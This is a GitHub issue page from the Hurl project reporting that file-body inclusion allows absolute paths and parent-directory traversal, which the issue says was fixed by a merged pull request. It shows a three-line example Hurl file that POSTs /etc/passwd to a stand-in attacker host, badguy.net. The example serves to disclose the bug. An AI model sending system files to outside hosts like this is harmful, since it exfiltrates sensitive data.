Arbitrary files can be included in body request/response #405

jcamiel · 2021-12-09T21:43:10Z

File inclusion (in request, response body etc...) should be very conservative (as written in https://hurl.dev/docs/request.html#file-body):

File are relative to the input Hurl file, and cannot contain implicit parent directory (..). You can use
--file-root option to specify the root directory of all file nodes.

In current Hurl version, any file can be included from absolute path to "escaping" path (ex ../../../secret.bin).
The following Hurl file, run without any option, should raise an error:

POST https://badguy.net
file,/etc/passwd;
HTTP/* 200

The text was updated successfully, but these errors were encountered:

jcamiel added the bug Something isn't working label Dec 9, 2021

jcamiel self-assigned this Jan 24, 2022

jcamiel linked a pull request Feb 1, 2022 that will close this issue

Check that data file is a child of user provided context dir. #463

Merged

fabricereix closed this as completed in #463 Feb 5, 2022

fabricereix added this to the 1.6.0 milestone Feb 10, 2022

datamuc mentioned this issue Jul 17, 2022

arbitary file uploads #674

Closed

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Arbitrary files can be included in body request/response #405

Arbitrary files can be included in body request/response #405

jcamiel commented Dec 9, 2021

Arbitrary files can be included in body request/response #405

Arbitrary files can be included in body request/response #405

Comments

jcamiel commented Dec 9, 2021